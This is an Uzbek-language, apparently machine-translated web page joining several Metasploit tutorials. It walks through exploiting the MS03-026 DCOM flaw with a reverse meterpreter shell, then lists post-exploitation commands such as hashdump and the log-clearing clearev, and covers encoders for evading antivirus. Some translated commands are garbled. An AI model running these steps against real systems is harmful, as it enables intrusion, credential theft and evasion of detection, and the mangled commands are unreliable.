Internet Windows Android
Kengaytirish

Metasploit operatsion qoidalari. Metasploit nima va u qanday ishlaydi? Umumiy modul sozlamalari

Asl nusxasi: Metasploit Framework bilan kirish testi
Dinesh Shetti tomonidan yozilgan
Nashr qilingan sana: 2011 yil iyul
Tarjimasi: V. Semenenko
Tarjima sanasi: 2011 yil iyul

Kirish

Albatta, men "Penetratsiyani tekshirish vositasi" deganda, bu iboralar haqida gapirganda, birinchi navbatda sizning ism-sharifingiz keladi. Va ajablanarli joyi yo'q! Ushbu loyiha Ruby tilida yozilgan dunyodagi eng yirik loyihalardan biridir. Uning satrlarining umumiy soni 700 000 dan oshadi! Bugungi kunda bu pentesting va zaifliklarni qidirishning de-fakto standartidir. Dasturning yillik nusxalarini yuklab olish soni bir milliondan oshadi. Loyiha, shuningdek, tasdiqlangan, yuqori sifatli ekspluatatsiyalar bo'yicha dunyodagi eng katta ommaviy ma'lumotlar bazasiga ega.

Msfconsole konsolida nomlari dcerpc naqshiga mos keladigan barcha ekspluatatsiyalarni qidirish uchun qidiruv dcerpc buyrug'ini kiriting. Ularning barchasidan 135-port zaifliklari yordamida serverga kirish uchun foydalanish mumkin.Bu buyruqni qatorga kiritishimiz bilan biz 3-rasmdagi skrinshotda ko'rsatilganidek, msfconsole oynasida barcha ekspluatatsiyalar ro'yxatini olamiz.

4-qadam:

Endi oldimizda rpc ekspluatatsiyalari ro'yxati mavjud bo'lsa, biz ularni amalda qo'llashdan oldin ularning har biri haqida to'liqroq ma'lumotga muhtojmiz. Muayyan ekspluatatsiyaning batafsil tavsifini olish uchun biz info exploit/windows/dcerpc/ms03_026_dcom buyrug'idan foydalanamiz. Oxirida nimaga erishamiz? Mumkin bo'lgan maqsadlarning tavsifi; ekspluatatsiya talablari; ushbu ekspluatatsiya tomonidan foydalaniladigan zaiflikning batafsil tavsifi; shuningdek, biz batafsil ma'lumotni topishingiz mumkin bo'lgan havolalar.

5-qadam:

Umuman olganda, use buyrug'ini ishga tushirish belgilangan ekspluatatsiya muhitini ishga tushiradi. Bizning holatda, biz ushbu ekspluatatsiyani ishga tushirish uchun use exploit/windows/dcerpc/ms03_026_dcom buyrug'idan foydalanamiz.

4-rasmdagi skrinshotda ko'rib turganingizdek, exploit/windows/dcerpc/ms03_026_dcom buyrug'i bilan ekspluatatsiyani ishga tushirgandan so'ng, buyruq qatori msf > dan msf exploit(ms03_026_dcom) > ga o'zgartirildi. Bu biz ushbu ekspluatatsiyaning vaqtinchalik muhitiga o'tganimizni anglatadi.

6-qadam:

Endi biz joriy stsenariy talab qilganidek, ekspluatatsiya konfiguratsiya faylini tahrirlashimiz kerak. Parametrlarni ko'rsatish buyrug'i bizga hozirda ishlayotgan ekspluatatsiya uchun zarur bo'lgan turli xil variantlarni ko'rsatadi. Bizning holatda, RPORT opsiyasi allaqachon 135 ga o'rnatilgan. Biz qilishimiz kerak bo'lgan narsa RHOST parametrining qiymatini o'rnatishdir, bu esa set RHOST buyrug'i bilan amalga oshiriladi.

Biz buyruq satriga RHOST 192.168.42.129 to'plamini kiritamiz va natijani ko'ramiz - masofaviy xostning IP manzili skrinshotda bo'lgani kabi 192.168.42.129 ga o'rnatiladi.

7-qadam:

Eksploitni ishga tushirishdan oldin qilishimiz kerak bo'lgan oxirgi narsa uning uchun foydali yukni o'rnatishdir. Mavjud bo'lgan barcha foydali yuklarni ko'rsatish buyrug'i yordamida ko'rish mumkin.

Skrinshotda ko'rib turganingizdek, payloadsni ko'rsatish buyrug'i biz tanlagan ekspluatatsiyaga mos keladigan barcha foydali yuklarni ko'rsatadi.Bizning holatlarimiz uchun biz zaxira tcp meterpreterdan foydalanamiz, uni PAYLOAD windows/meterpreter/reserve_tcp buyruqlar to'plami bilan belgilaymiz. , masofaviy serverda buyruq qobig'ini ishga tushiradigan, agar unga muvaffaqiyatli kirish mumkin bo'lsa, ekspluatatsiya muvaffaqiyatli ishlashi uchun barcha kerakli maydonlar tegishli qiymatlarga ega bo'lishini ta'minlash uchun endi variantlarni ko'rsatish buyrug'ini qayta ishga tushirishimiz kerak.

E'tibor bering, foydali yuk uchun LHOST opsiyasi" o'rnatilmagan. Shuning uchun biz mahalliy IP manzilni (masalan, 192.168.42.128) LHOST 192.168.42.128 buyrug'i bilan o'rnatishimiz kerak.

8-qadam:

Endi hamma narsa tayyor va ekspluatatsiya to'g'ri sozlangan, uni ishga tushirish vaqti keldi.

Jabrlanuvchi mashinamiz ekspluatatsiyani ishga tushirish uchun mavjudligiga ishonch hosil qilish uchun tekshirish buyrug'idan foydalanishimiz mumkin. Ushbu parametr barcha ekspluatatsiyalar uchun mavjud emas. Misol uchun, skrinshot bizning holatlarimizda aynan shunday ekanligini aniq ko'rsatib turibdi.

Lekin har qanday holatda ham foydalanishga arziydi. Bu tizimning yaxshi yordami, ya'ni masofaviy kompyuterda siz ishga tushirmoqchi bo'lgan ekspluatatsiya hali tuzatilmaganligiga ishonch hosil qilish imkonini beradi. Boshqacha qilib aytadigan bo'lsak, masofaviy kompyuterda ekspluatatsiyani qayta ishga tushirmaslik uchun.

Bizning holatda, skrinshotda ko'rib turganingizdek, biz tanlagan ekspluatatsiyalar tekshirish variantini qo'llab-quvvatlamaydi.

Exploit buyrug'i tanlangan ekspluatatsiyani ishga tushiradi, bu foydali yuk uzoqdagi mashinada bajarilishi uchun barcha kerakli harakatlarni bajaradi.

Skrinshotda ekspluatatsiya 192.168.42.129 IP-manzilli masofaviy kompyuterda 135-portning zaifligidan foydalangan holda muvaffaqiyatli bajarilganligini ko'rsatadi. Ekspluitning muvaffaqiyatli bajarilishi fakti buyruq satrida oxirgi so'rovni meterpreter > ga o'zgartirish orqali ko'rsatilgan. .

9-qadam:

Endi jabrlanuvchi va bizning mashinamiz o'rtasida qo'shimcha aloqa o'rnatildi, biz serverni nazorat qilishimiz kerak. Tegishli amallarni bajarish uchun masofaviy serverda ishga tushirishimiz mumkin bo'lgan barcha mavjud buyruqlar ro'yxatini olish uchun yordamdan foydalanishimiz mumkin.

Quyida ba'zi meterpreter buyruqlarining natijalari keltirilgan:

  • ipconfig - masofaviy kompyuterda ishlaydigan barcha TCP/IP ulanishlarining konfiguratsiya ma'lumotlarini ko'rsatadi;
  • getuid - konsolda server nomini ko'rsatadi;
  • hashdump - SAM ma'lumotlar bazasining dumpini yaratadi;
  • clearev - masofaviy qurilmada qoldirgan bo'lishingiz mumkin bo'lgan barcha izlaringizni o'chiradi.

Shunday qilib, biz Windows 2003 Server bilan ishlaydigan masofaviy serverga kirish uchun ramkadan muvaffaqiyatli foydalandik. Biz o'zimizga qobiqdagi buyruqlarni bajarish qobiliyatini berdik, bu bizga masofaviy mashinani to'liq boshqarish va unda xohlagan vazifalarni bajarish qobiliyatini beradi.

Metasploit ramkasidan potentsial foydalanish:

  • boshqa avtomatik zaifliklarni aniqlash tizimlari bilan birgalikda hisobotlarni yaratish uchun pentestingda foydalanish mumkin. Ushbu tizim yordamida siz zaifliklar haqiqatan ham xavfli yoki yo'qligini va ulardan tizimga kirish uchun foydalanish mumkinligini aniqlashingiz mumkin.
  • har kuni tom ma'noda paydo bo'ladigan yangi ekspluatatsiyalarni sinab ko'rish uchun ishlatilishi mumkin. Ushbu tekshirishni ushbu maqsad uchun maxsus ishlab chiqilgan mahalliy serverda qilishingiz mumkin. Ushbu ramka yordamida siz yangi ekspluatatsiya samarali yoki yo'qligini osongina tekshirishingiz mumkin.
  • Shuningdek, bu sizning pentesting tizimingizda hujum sodir bo'lgan taqdirda IDS to'g'ri sozlanganligini tekshirish uchun ajoyib vositadir.

Xulosa

Ushbu maqola ramkadan foydalanishning yuzaki sharhidir. Bu sizga zaifliklar uchun tizimingizning umumiy ko'rinishini qanday bajarish kerakligini ko'rsatadi. Hatto ushbu maqolada olingan dastlabki tajriba ham ekspluatatsiyalar qanday ishlashini tushunishga yordam beradi. Bu kelajakda o'z ekspluatatsiyalaringizni yozish uchun yaxshi yordam bo'lishi mumkin. Va bu, o'z navbatida, pentesting vazifalarini yuqori va sifatli darajada bajarishga yordam beradi.

Biz xakerlikdan foydalanish bo'yicha ko'plab maqolalar yozdik Metasploit, shu jumladan, qanday qilib iz qoldirmaslik, saytning ichki arxitekturasini o'rganish haqida, shuningdek, buyruqlar va skriptlar bo'yicha ko'plab cheat varaqlari.

Ushbu qo'llanma bilan biz o'rganish va foydalanish uchun keng qamrovli maqolalar turkumini boshlaymiz Metasploit. Bu qisqacha asoslarni qamrab oladigan birinchi kirish qismidir Metasploit- Yer sayyorasidagi eng kuchli xakerlik platformalaridan biri.

Metasploitning kelib chiqishi va o'rnatilishi

Metasploit 2003 yilda xaker HD Mur tomonidan ishlab chiqilgan ochiq manbali loyihadir. U dastlab yozilgan Perl, lekin 2007 yilda u butunlay qayta yozilgan Ruby. 2009 yilda u sotib olindi Tez 7, axborot xavfsizligi xizmatlarini taqdim etishga ixtisoslashgan kompaniya, shuningdek, zaiflik skanerini chiqardi Nexpose.

Metasploit 4.12 versiyasi allaqachon tarqatishga kiritilgan Kali Linux. Shuningdek, u o'rnatilgan BackTrack. Agar siz boshqa tarqatishdan foydalansangiz Linux yoki MaxOS, keyin uni saytdan yuklab olishingiz kerak bo'ladi Tez 7.

Agar foydalanayotgan bo'lsangiz Windows, keyin siz ham yuklab olishingiz kerak bo'ladi Metasploit saytdan Tez 7, lekin biz uni ishga tushirishni tavsiya etmaymiz Windows. Siz buni albatta qilishingiz mumkin, lekin biz ushbu maqolada ko'rib chiqadigan ko'plab xususiyatlar u erda ishlamaydi.

U Metasploit bir qancha versiyalari mavjud, jumladan Metasploit Pro(to'liq tijorat versiyasi) va Jamiyat nashri(ozod). Oxirgisi o'rnatilgan Kali. Biz e'tiborni qaratamiz Jamiyat nashri, chunki ko'pchiligingiz 30 000 dollarlik Pro versiyasini sotib olmaysiz deb o'ylaymiz.

Metasploitdan foydalanish usullari

Metasploit bir necha usulda foydalanish mumkin. Biz doimo foydalanadigan eng keng tarqalgan usul - bu interaktiv konsol Metasploit. U buyruq satrida msfconsole ni kiritish orqali faollashtiriladi Kali. Bundan tashqari, bir nechta boshqa usullar mavjud.

Msfcli

Keling, nimadan foydalanishingiz mumkinligidan boshlaylik Metasploit buyruq satridan Kali yoki rejimda msfcli. Bir qarashda, biz konsolda bo'lganimizda, biz buyruq satridan foydalanamiz. Aslida, biz maxsus kalit so'zlar va buyruqlar bilan interaktiv konsoldan foydalanamiz. Qachondan ishlaymiz msfcli, keyin biz aslida Linux buyruq satridan foydalanamiz.

Barcha mavjud buyruqlar haqida ma'lumot olish uchun msfcli, konsolga yozing:

Kali > msfcli -h

Endi ekspluatatsiyani ishga tushirish uchun msfcli buyruqni kiriting:

Kali > msfcli foydali yuk = rhost = lhost= E

Bu erda "E" qisqartmasi "Bajarish"

Yaratish haqidagi maqolamizda foydali yuk(foydali yuklar) antivirus dasturlaridan himoya qilish uchun biz buyruqdan foydalanamiz msfencode Va msfpayload buyruq qatori rejimida ( msfcli).

Foydalanishning noqulayligi msfcli kabi yaxshi qo'llab-quvvatlanmaydi, deb hisoblanadi msfconsole, va siz bitta qobiq bilan cheklanasiz, bu esa ba'zi ilg'or ekspluatatsiyalarni imkonsiz qiladi.

Armitaj

Agar foydalanmoqchi bo'lsangiz Metasploit grafik foydalanuvchi interfeysi (GUI) bilan, keyin bir nechta variant mavjud. Misol uchun, Rafael Mudge ishlab chiqdi Armitaj(bu juda original ilmiy-fantastik kiber xakerlik kitobi Neuromancerning bosh qahramonining ismi. Bu janrni yoqtiradigan har bir xaker o'qishi shart. Fantastika).

Uni boshlash uchun Armitaj V Kali, shunchaki kiriting:

Kali > armitage

Agar Armitaj ulana olmaydi, keyin boshqa buyruqlarni sinab ko'ring:

Kali > service start postgresql kali > service start metasploit kali > service stop metasploit

Armitaj uning ustidagi grafik interfeysdir Metasploit, mijoz-server arxitekturasida qurilgan. siz yugurasiz Metasploit server sifatida va Armitaj uning mijozi bo'lib, sizga funksiyalarga to'liq kirish imkonini beradi Metasploit intuitiv bo'lmasa ham, to'liq funktsional foydalanish, GUI. Agar haqiqatan ham kerak bo'lsa GUI o'zingizni qulay his qilish uchun foydalaning Armitaj. Ammo buyruq qatorini o'zlashtirish har qanday o'zini hurmat qiladigan xaker uchun amalda hayotiy zaruratdir.

Modullar

U Metasploit Olti xil modul mavjud:

  1. foydali yuklar
  2. ekspluatatsiya qiladi
  3. post
  4. yo'q
  5. yordamchi
  6. enkoderlar

Foydali yuklar- bu biz buzilgan tizimda qoldiradigan kod. Ba'zilar ularni tinglovchilar, rootkitlar va boshqalar deb atashadi. IN Metasploit bu yuklamalar deb ataladi. Foydali yuklar buyruq qatori yordamchi dasturlarini o'z ichiga oladi, Tarjimon va hokazo. Foydali yuk ning turli xil turlari mavjud, masalan, sahnalashtirilgan, mos ravishda, NoNX(ba'zi zamonaviy protsessorlarda "Bajarilmaydi" funksiyasini chetlab o'tadi) PassiveX(chiqish trafigi haqida xavfsizlik devori qoidalarini chetlab o'tadi), IPv6 va boshqalar.

Ekspluatatsiyalar tizimdagi zaiflik yoki nuqsondan foydalanadigan qobiq kodidir. Bu juda aniq kod. Masalan, operatsion tizim, xizmat paketlari (SP), ma'lum xizmatlar, portlar va hatto ilovalar uchun ekspluatatsiyalar mavjud. Ular, shuningdek, operatsion tizim turiga ko'ra tasniflanishi mumkin, shuning uchun ekspluatatsiya Windows ichida ishlamaydi Linux va teskari.

Post- bu biz tizimga ekspluatatsiyadan keyingi hujumlar uchun foydalanishimiz mumkin bo'lgan modullardir (ya'ni tizimga kirishdan keyin).

Yo'q- OperationS uchun qisqa. X86 oilasi protsessorlarida odatda o'n oltilik 0x90 sifatida belgilanadi. Bu shunchaki "hech narsa qilmaslik" degan ma'noni anglatadi. Bu buferni to'ldirish hujumlari uchun juda muhim bo'lishi mumkin. Biz modullarni ko'rib chiqishimiz mumkin yo'q buyrug'i yordamida ko'rsatish.

Msf>nos ko'rsatish

Yordamchi- boshqa toifalarning hech biriga to'g'ri kelmaydigan ko'plab modullarni (695) o'z ichiga oladi. Bularga termoyadroviy qurilmalar, skanerlar, DoS (xizmat ko'rsatishni rad etish) hujum modullari va boshqalar kiradi. Batafsil ma'lumot uchun men sizga bizning maqolamizga murojaat qilaman Yordamchi modullar.

Kodlovchilar- bu antivirus dasturlari va boshqa xavfsizlik tizimlarini chetlab o'tish uchun foydali yuklarimizni turli usullar bilan kodlash imkonini beruvchi modullar. Biz ushbu kodlovchilarni yozish orqali ko'rishimiz mumkin:

Msf>koderlarni ko'rsatish

Ko'rib turganingizdek, ichida Metasploit O'rnatilgan bir nechta enkoderlar mavjud. Bizning sevimlilarimizdan biri - shikata_ga_nai. Foydalanishga imkon beradi foydali yuk XOR, bu antivirus dasturlari va boshqa xavfsizlik tizimlarini aldashga yordam beradi.

Qidirmoq

IN Metasploit 4 qidiruv opsiyasi paydo bo'ldi. Ilgari men foydalanishim kerak edi msfcli va jamoa grep modullarni topish uchun. Hozir Tez 7 kalit so'z qidirish va boshqa ba'zi xususiyatlar qo'shildi. Qidiruv qo'shilishi juda o'z vaqtida edi, chunki Metasploit sezilarli darajada o'sdi va so'rovlar uchun oddiy qidiruv grep 1400 dan ortiq ekspluatatsiyalar orasidan hech narsa topish uchun endi etarli emas edi.

Kalit so'zlarni qidirish sizga oddiy qidiruvlarni ham, batafsilroq qidiruv so'rovlarini ham bajarishga imkon beradi. Masalan, type kalit so‘zi yordamida topmoqchi bo‘lgan modul turini aniqlashimiz mumkin:

Msf > qidiruv turi: ekspluatatsiya

Agar buni qilsak Metasploit bizga 1295 ekspluatatsiyani qaytaradi. Juda foydali emas.

Ammo agar biz mashinaga hujum qilishni xohlayotganimizni bilsak Quyosh mikrotizimlari tomonidan boshqariladi Solaris (Sun UNIX), keyin biz qidiruvimizni aniqlashtirishimiz va faqat ekspluatatsiyalarni qidirishimiz mumkin Solaris. Bunday holda biz kalit so'zdan foydalanishimiz kerak platforma.

Msf > qidiruv turi: ekspluatatsiya platformasi: solaris

Endi biz qidiruvimizni o'sha bir nechta ekspluatatsiyalarga qarshi ishlay oladigan darajada qisqartirdik Solaris.

Qidiruvni yanada takomillashtirish uchun biz hujum qilmoqchimiz deb faraz qilaylik Solaris RPC (sunrpc) va shunga ko'ra, biz faqat ushbu maxsus xizmatga hujum qiladigan ekspluatatsiyalarni ko'rishimiz kerak. Biz kalit so'zni qo'shamiz " sunrpc"Quyida ko'rsatilganidek, qidiruv so'rovimizga:

Msf > qidiruv turi: ekspluatatsiya platformasi: solaris sunrpc

Ko'rib turganingizdek, bu qidiruv natijalarini beshta ekspluatatsiya moduligacha qisqartirdi!

U Metasploit ko'plab imkoniyatlar mavjud, biz kelgusi maqolalarda o'rganishni davom ettiramiz Metasploit. Ba'zi hiyla-nayranglarni sinab ko'ring Metasploit‘e, saytdagi boshqa xabarlarda tasvirlangan. Qaytib kelishingizga ishonch hosil qiling! Siz o'qiysiz Metasploit va professional kabi hack qilishni o'rganing!

Mas'uliyatni rad etish: Ushbu maqola faqat ta'lim maqsadida yozilgan. Muallif yoki noshir ushbu maqolani zararli maqsadlarda nashr etmagan. Agar o'quvchilar ma'lumotlardan shaxsiy manfaatlar uchun foydalanmoqchi bo'lsalar, muallif va nashriyot etkazilgan zarar yoki zarar uchun javobgar emas.

Birinchi narsa qilish kerak. Agar siz hali Metasploit-ni yuklab olmagan bo'lsangiz, tekshiring

Mehmonlardan yashirin

Va agar Metasploit kompyuteringizda allaqachon o'rnatilgan bo'lsa, tabriklaymiz! Siz ishlashni boshlashingiz mumkin.

Metasploit haqida

Metasploit - bu zaifliklarni sinash, topish va ulardan foydalanish platformasi. U Metasploit ramkalari va ularning tijorat hamkasblarini o'z ichiga oladi: Metasploit Pro, Express, Community va Nexpose Ultimate.

Metasploit ramkasi

Metasploit Framework tijorat mahsulotlarini yaratish uchun asosdir. Bu bilan loyiha

Mehmonlardan yashirin

Sinovlar va keng qamrovli xavfsizlik tekshiruvlarini o'tkazish uchun infratuzilma, tarkib va ​​vositalarni taqdim etadi. Ochiq manbalar hamjamiyati va o'zining mehnatsevar kontent jamoasi tufayli yangi modullar muntazam ravishda qo'shiladi. Bu ular nashr etilgandan so'ng darhol sizga taqdim etilishini anglatadi.

Internetda Metasploit ramkasidan qanday foydalanishni o'rganishga yordam beradigan juda ko'p manbalar mavjud. Biroq, biz sizga o'qishni tavsiya qilamiz

Mehmonlardan yashirin

Bu Rapid 7 jamoasi tomonidan qo'llab-quvvatlanadi.

Agar kerakli narsani topa olmasangiz, bizga xabar bering va biz sizga kerakli ma'lumotlarni qo'shamiz.

Metasploit Pro va boshqa tijorat versiyalari

Pro, Express, Community va Nexpose Ultimate o'z ichiga olgan Metasploitning tijorat versiyalari veb-ga asoslangan penetratsion test interfeysidan foydalanishni afzal ko'rgan foydalanuvchilar uchun mavjud. Veb-interfeysga qo'shimcha ravishda, ba'zi tijorat nashrlari Metasploit Framework-da mavjud bo'lmagan xususiyatlarni taqdim etadi.

Qo'shimcha funktsiyalarning aksariyati zaiflik testi, ijtimoiy muhandislik va shafqatsiz hujum usullari kabi umumiy sinov vazifalarini avtomatlashtirish va optimallashtirishga qaratilgan.

Agar siz buyruq qatoridan foydalansangiz, lekin hali ham tijorat xususiyatlariga kirishni istasangiz, xavotir olmang. Metasploit Pro Msf konsoliga juda o'xshash konsolni o'z ichiga oladi, bundan tashqari u Metasploit Provia buyruq qatori xususiyatlarining aksariyatiga kirish imkonini beradi.

Metasploit ishga tushirilmoqda

Rapid7 Linux va Windows operatsion tizimlari uchun Metasploitning tijorat va ochiq manbali versiyalarini taqdim etadi.

Metasploit Pro-ni mahalliy kompyuteringizga yoki masofaviy xostga o'rnatish uchun faylni yuklab olishingiz va ishga tushirishingiz mumkin. Metasploit Pro-ni qayerga o'rnatishingizdan qat'i nazar, siz veb-brauzer orqali interfeysga kirishingiz mumkin. Metasploit serverga xavfsiz ulanishdan foydalanadi.

Agar siz Metasploit Pro-ni veb-serverga o'rnatgan bo'lsangiz, foydalanuvchilar istalgan joydan interfeysga kirish uchun veb-brauzerdan foydalanishlari mumkin. Foydalanuvchilar server manzili va portini bilishlari kerak. Odatiy bo'lib, Metasploit xizmati 3790 portdan foydalanadi. O'rnatish jarayonida Metasploit foydalanadigan portni o'zgartirishingiz mumkin.

Agar Metasploit mahalliy kompyuteringizda qayta ishlayotgan bo'lsa, Metasploit Pro-ga kirish uchun localhost va 3790 portidan foydalanishingiz mumkin. Masalan, kiriting

Mehmonlardan yashirin

UI-ni yuklash uchun brauzer URL-da.

O'rnatish haqida qo'shimcha ma'lumot olish uchun "Metasploit ramkasini o'rnatish" bo'limiga qarang yoki "

Mehmonlardan yashirin

».

Metasploit Pro komponentlari

Metasploit Pro sinov vositalarining to'liq to'plamini ta'minlovchi bir nechta komponentlardan iborat. Quyidagi komponentlar Metasploit Pro-ga kiritilgan.

Metasploit ramkasi

Metasploit Framework - bu turli xil ilovalar, operatsion tizimlar va platformalarga kirishni ta'minlaydigan ochiq kodli test tizimi. Qo'shimcha maxsus xavfsizlik vositalarini yaratish yoki yangi zaifliklar uchun o'z kodingizni yozish uchun Metasploit Framework-dan foydalanishingiz mumkin.

Metasploit jamoasi muntazam ravishda yangi modullar va Metasploit Pro uchun tuzatishlar va yaxshilanishlarni o'z ichiga olgan yangilanishlarni chiqaradi.

Modullar

Modul - bu Metasploit Framework funksiyalarini kengaytiradigan yagona kod yoki dasturiy ta'minot. Modullar Metasploit Framework tomonidan taqdim etilgan funksiyalarni avtomatlashtiradi.
Modullar mavjud: ekspluatatsiya, foydali yuk, NOP, ekspluatatsiyadan keyingi modul va boshqalar. Modul turi uning maqsadini belgilaydi.

Xizmatlar

Metasploit quyidagi xizmatlardan foydalanadi:

  • Postgre SQL Metasploit Pro loyiha ma'lumotlarini saqlash uchun foydalanadigan ma'lumotlar bazasini boshqaradi.
  • Ruby on Rails Metasploit Pro veb-interfeysini boshqaradi.
  • Pro xizmati yoki Metasploit xizmati Rails, Metasploit ramkasi va Metasploit RPC serveridan foydalanadi.
Veb-interfeys

Metasploit Pro bilan ishlash uchun veb-interfeys mavjud. Uni ishga tushirish uchun brauzeringizni oching va o'ting

Mehmonlardan yashirin

.

Buyruqlar qatori interfeysi

Console Pro sizga Metasploit yordamida buyruq qatorini bajarish imkonini beradi.

Asosiy tushunchalar va atamalar

Sizni Metasploit Pro bilan tanishtirish uchun siz tushunishingiz kerak bo'lgan ba'zi tushunchalar va atamalar:

  • Qo'shimcha modul: Foydali yukni bajarmaydigan modul. Qo'shimcha modullarga misollar: skanerlar, server hujumlarini rad etish va boshqalar.
  • Bog'lovchi qobiqli yuk: Tinglovchini foydalanilayotgan tizimga biriktiruvchi va tinglovchiga ulanishni kutuvchi buyruq qatori.
  • Malumotlar bazasi: Ma'lumotlar bazasi xost ma'lumotlarini, tizim jurnallarini, to'plangan ma'lumotlarni va hisobot ma'lumotlarini saqlaydi.
  • Kengaytirilgan skanerlash: Kengaytirilgan skanerlash Nmap va turli Metasploit modullarini bog'laydigan Metasploit skaneridir.
  • Ekspluatatsiya qilish: Muayyan zaiflikdan foydalanadigan va tajovuzkorga maqsadli tizimga kirish imkonini beruvchi dastur. Dastur, qoida tariqasida, foydali yukni o'z ichiga oladi va uni maqsadga yetkazadi. Misol uchun, eng keng tarqalgan ekspluatatsiyalardan biri MS08-067 bo'lib, u Windows xizmatining zaifligini nishonga oladi va kodni masofadan turib bajarishga imkon beradi.
  • Ekspluatatsiya moduli: Maqsadli tizimga kirish uchun tizim yoki ilovadagi zaiflikdan foydalanish uchun buyruqlar ketma-ketligini bajaradigan modul. Qisqasi, ekspluatatsiya seans yaratadi. Ekspluatatsiya modullariga quyidagilar kiradi: bufer to'lib ketishi, kodni kiritish va veb-ilovalar ekspluatatsiyasi.
  • Tinglovchi: Tinglovchi har qanday foydalanilgan maqsad yoki hujum qiluvchi mashinadan ulanish signalini kutadi va ulanishni boshqaradi.
  • Tarjimon: Interaktiv qobiqni ta'minlaydigan rivojlangan ko'p funktsiyali foydali yuk. Meterpreter qobig'idan siz faylni yuklab olishingiz, foydalanuvchi hisoblari uchun parol xeshlarini olishingiz va hokazo. Meterpreter xotiraga asoslangan, shuning uchun ko'pchilik bosqinlarni aniqlash tizimlari uni ko'rmaydi.
  • Modul: Metasploit Framework funksiyalarini kengaytiruvchi mustaqil kod qismi. Har xil turdagi modullar mavjud: ekspluatatsiya, qo'shimcha yoki ekspluatatsiyadan keyingi. Modul turi uning maqsadini belgilaydi. Masalan, maqsadning qobig'ini ochishi mumkin bo'lgan har qanday modul ekspluatatsiya deb ataladi. Mashhur ekspluatatsiya moduli MS08-067.
  • Foydali yuk: Ekspluatatsiyadan so'ng maqsadli tizimda ishlatiladigan haqiqiy kod maqsadni muvaffaqiyatli buzadi. Foydali yuk sizga qobiqqa qanday ulanishni va uni kuzatishni boshlaganingizdan so'ng maqsadli tizim haqida nima qilishni xohlayotganingizni aniqlash imkonini beradi. Foydali yuk teskari bo'lishi yoki qobiq bilan bog'liq bo'lishi mumkin. Bu ikki tur o'rtasidagi asosiy farq aloqa yo'nalishidir.
  • Ekspluatatsiyadan keyingi modul: Qo'shimcha ma'lumot to'plash yoki foydalaniladigan maqsadli tizimga qo'shimcha kirish imkonini beruvchi modul. Ekspluatatsiyadan keyingi modullarga misollar script ilovalari va xizmatlarini o'z ichiga oladi.
  • Loyiha: Maqsadlar, vazifalar, hisobotlar va skanerlashning bir qismi bo'lgan ma'lumotlar uchun konteyner. Loyihada skanerlar yaratish va vazifalarni sozlash uchun foydalaniladigan ish maydoni mavjud. Har bir kirish testi loyiha ichida ishlaydi.
  • Foydali yuk teskari qobiq: Hujum qiluvchi mashinaga ulanadigan qobiq.
  • Qobiq (qobiq): Masofaviy nishonga kirishni ta'minlovchi interfeys.
  • Shell kodi: ekspluatatsiya foydali yuk sifatida foydalanadigan ko'rsatmalar to'plami.
  • Vazifa: Metasploit amalga oshirishi mumkin bo'lgan skanerlash, ekspluatatsiya, hisobot berish kabi amal.
  • Ish joyi: Loyiha bilan bir xil, faqat Metasploit Framework bilan ishlashda foydalaniladi.
  • Zaiflik: tajovuzkorga maqsadni buzishga imkon beruvchi xavfsizlik kamchiligi. Buzilgan tizim imtiyozlarning kuchayishiga, ma'lumotlarga ruxsatsiz kirishga, parollarning o'g'irlanishiga va buferning to'lib ketishiga olib kelishi mumkin.
Metasploit Pro qanday ishlaydi

Umumiy kirish testi jarayonini bir necha bosqich yoki bosqichlarga bo'lish mumkin. Siz foydalanadigan metodologiyaga qarab, penetratsion test to'rtdan etti fazagacha bo'lishi mumkin. Bosqichlarning nomlari har xil bo'lishi mumkin, lekin ular odatda quyidagilardan iborat: tekshirish, skanerlash, operatsiya, operatsiyadan keyingi, kirishni ta'minlash, tozalash va hisobot berish.

Metasploit Pro testning turli bosqichlari asosida ishlashi mumkin. Ish jarayoni odatda quyidagi bosqichlarni o'z ichiga oladi:

  1. Loyiha yarating: Maqsadlaringizdan to'plangan ma'lumotlarni saqlash uchun loyiha yarating.
  2. Ma'lumot to'plash: Metasploit Pro-ni zaifliklarni aniqlashga yordam beradigan xost ma'lumotlari bilan ta'minlash uchun keng qamrovli skanerlash, Nexpose yoki vositalardan foydalanadi.
  3. Ekspluatatsiya: ma'lum zaifliklarga qarshi hujumlarni boshlash va buzilgan maqsadlarga kirish uchun avtomatlashtirilgan yoki qo'lda ekspluatatsiyalardan foydalanadi.
  4. Ekspluatatsiyadan keyingi: Buzilgan maqsadlar haqida ko'proq ma'lumot to'plash uchun ekspluatatsiyadan keyingi modullar yoki interaktiv seanslardan foydalaning. Metasploit Pro jonli kompyuterda ochiq seanslar bilan ishlash uchun ishlatilishi mumkin bo'lgan bir nechta vositalarni taqdim etadi. Masalan, ichki ilovalar haqidagi ma'lumotlarni aniqlash va parol va xesh yig'ish funksiyasidan foydalanish uchun buzilgan maqsadlardagi umumiy fayl tizimlariga qarashingiz mumkin.
  5. Qo'pol kuch hujumi: to'g'ri kirishni aniqlash uchun to'plangan parollarni tekshirish uchun qo'pol kuch hujumini bajaring.
  6. Ochiq sessiyalarni tozalash: Tizimda bo'lishi mumkin bo'lgan ma'lumotlar haqidagi har qanday ma'lumotlarni o'chirish uchun foydalanilgan maqsadlarda ochiq seanslarni yopishingiz mumkin. Ushbu jarayon maqsadli tizimdagi asl sozlamalarni tiklaydi.
  7. Hisobot yaratish: Batafsil xulosalar bilan hisobot yarating. Metasploit Pro hisobot ma'lumotlarini sozlash uchun foydalanishingiz mumkin bo'lgan bir nechta hisobot turlarini taqdim etadi. Eng ko'p qo'llaniladigan audit hisoboti bo'lib, u loyihada olingan xostlar va hisobga olish ma'lumotlarini batafsil baholashni ta'minlaydi.
Metasploit Pro-ga veb-interfeys orqali kirish

Metasploit Pro bilan ishlash uchun veb-interfeysdan foydalanish uchun brauzeringizni oching va ga o'ting

Mehmonlardan yashirin

Agar Metasploit kompyuteringizda qayta ishga tushirilsa, Localhost-ni masofaviy kompyuterning manzili bilan almashtirishingiz kerak.
Veb-interfeysga kirish uchun Metasploit Pro litsenziya kalitini faollashtirishda yaratilgan hisob qaydnomasi uchun foydalanuvchi nomi va parol kerak bo'ladi. Agar hisobingiz uchun o'rnatgan parolni eslay olmasangiz, bu sizga kerak

Mehmonlardan yashirin

.
Qo'llab-quvvatlanadigan brauzerlar

Agar foydalanuvchi interfeysi barcha elementlarni kutilganidek ko'rsatmasa, quyida keltirilgan qo'llab-quvvatlanadigan brauzerlardan birini ishlatayotganingizga ishonch hosil qiling:

  • Google Chrome 10+
  • Mozilla Firefox 18+
  • Internet Explorer 10+
  • Iceweasel 18+
Metasploit Pro-ga buyruq satridan kirish

